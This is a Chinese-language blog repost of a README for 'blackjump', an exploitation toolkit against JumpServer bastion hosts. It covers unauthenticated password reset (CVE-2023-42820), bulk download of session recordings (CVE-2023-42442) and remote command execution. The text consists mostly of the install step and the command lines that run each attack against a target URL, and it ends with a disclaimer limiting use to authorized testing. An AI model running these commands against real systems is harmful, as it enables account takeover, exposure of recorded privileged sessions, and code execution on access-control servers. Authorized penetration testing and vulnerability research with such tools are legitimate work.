admin管理员组

文章数量:1794759

JumpServer堡垒机漏洞利用工具集

项目介绍

JumpServer 堡垒机综合漏洞利用

  • 未授权任意用户密码重置 (CVE-2023-42820)
  • 未授权一键下载所有操作录像 (CVE-2023-42442)
  • 未授权任意命令执行漏洞 (RCE 2021)

依赖安装

代码语言:javascript代码运行次数:0运行复制
python3 -m pip install -r requirements.txt

使用指南

CVE-2023-42820: 如果知道目标的用户名和邮箱可以指定--user--email 参数

代码语言:javascript代码运行次数:0运行复制
python3 blackjump.py reset https://vulerability

CVE-2023-42442: output/ 目录下的 <uuid4>.tar 文件扔进 jumpserver播放器播放即可

代码语言:javascript代码运行次数:0运行复制
python3 blackjump.py dump https://vulerability

远程命令执行:

代码语言:javascript代码运行次数:0运行复制
python3 blackjump.py rce http(s)://vulerability

帮助信息:

代码语言:javascript代码运行次数:0运行复制
python3 blackjump.py {reset,dump,rce} -h

免责声明

请勿从事非法测试,利用此工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该仅供安全人员用于授权测试,请勿非法使用!!!

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。原始发表:2024-10-17,如有侵权请联系 cloudcommunity@tencent 删除安全python3测试工具漏洞

本文标签: JumpServer堡垒机漏洞利用工具集